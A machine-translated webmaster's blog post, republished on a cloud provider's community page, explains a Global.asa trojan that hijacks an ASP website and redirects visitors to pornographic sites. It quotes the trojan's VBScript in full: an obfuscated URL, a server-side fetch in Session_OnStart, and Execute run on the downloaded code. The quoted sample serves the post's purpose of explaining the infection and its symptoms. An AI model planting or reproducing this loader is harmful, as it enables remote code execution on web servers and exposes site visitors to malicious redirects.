Home > Cloud Computing > Cloud Security

Deciphering global. asa causes the website to be infected or redirected

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Recently, when I checked the website traffic statistics, I found that the traffic was abnormal. So when I checked the website program, I found that the program had an additional file. The file name is Global. asa, my website uses an open-source enterprise website building system. I didn't pay attention to this problem at the beginning. Yesterday, my website traffic suddenly fell down, at that time, I suspected that there was a problem with the website program, but I couldn't find it. Later, customers who frequently visit the website called and told me: "opening your website from Baidu will automatically jump to some pornographic websites, and 360 will prompt a trojan virus ." So I searched for some solutions to the Global. asa Trojan on the Internet. I will explain the solutions below.
 
What is a global. asa Trojan?
 
Global. asa is introduced in Baidu encyclopedia as follows:
 
The Global. asa file is an optional file that can contain the declaration of objects, variables, and methods that can be accessed by each page of ASP applications. All valid browser scripts can be used in Global. asa. In Global. asa, we can tell the application and session object what to do at startup and end. The code to complete this task is placed in the event operator.
 
According to the above introduction, we should have a general understanding. In fact, this Trojan is a website program Trojan, also known as a script Trojan. But why are hackers named after global. asa? This file can call many programs. For example, when a customer accesses your website, he can call the redirection command. Because of the special role of the global. asa file, it was exploited by hackers and made a website Trojan.
 
First, let's take a look at the code of the global. asa Trojan:
 
Sub Session_OnStart
On Error Resume Next
Url = "h" & "t" & "t" & "p "&": "&"/"&"/"&" w "&". B "&" a "&" I "&" d "&" u ". c "&" o "&" m "&"/"&" f "&" u "&" c "&" k "&". "&" a "&" s "&" p"
Set ObjXMLHTTP = Server. CreateObject ("MSXML2.serverXMLHTTP ")
ObjXMLHTTP. Open "GET", url, False
ObjXMLHTTP. setRequestHeader "User-Agent", url
ObjXMLHTTP. send
GetHtml = ObjXMLHTTP. responseBody
Set ObjXMLHTTP = Nothing
Set objStream = Server. CreateObject ("Adodb. Stream ")
ObjStream. Type = 1
ObjStream. Mode = 3
ObjStream. Open
ObjStream. Write GetHtml
ObjStream. Position = 0
ObjStream. Type = 2
ObjStream. Charset = "gb2312"
GetHtml = objStream. ReadText
ObjStream. Close
Set objStream = Nothing
If instr (GetHtml, "by * aming")> 0 then
Execute GetHtml
End if
End sub
Sub Session_OnEnd
End sub
</Script>
 
Let me explain the role of this code first: Because global. the asa file is a website Startup File. When a website is accessed by a user, the content of the Application_Start code segment is executed. When a user accesses the site for the first time, the Session_Start code segment is executed, therefore, the purpose of this code segment is to automatically download and obtain the trojan content during access. The above is the trojan code with the jump function.
 
Symptoms of global. asa Trojan Infection
 
Global. the asa file is hidden and you cannot see it on FTP. You have detected the hidden global by using the sinesafe website trojan detection tool. when a user clicks in from Baidu, the website automatically jumps to other websites, such as pornographic websites and websites with viruses. Baidu site: your website will find many pornographic pages, as shown in:
 
Vulnerabilities are exploited by hackers to obtain the permissions of your website and upload and create Trojans. You will not be infected with Trojans until you have completed website security. Here, you must not underestimate the security of your website. Further security is particularly important, involving the hearts of our webmasters. If your website is not secure, Baidu will be able to pull out its hair and the website that has worked so hard will be destroyed, you are not reconciled. Only when your website is secure can you bring stable sources of customers. Security issues cannot be ignored. To provide users with a secure and stable website platform, of course, it brings you the biggest marketing revenue.

From the blog of Xiaoyao revenge

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More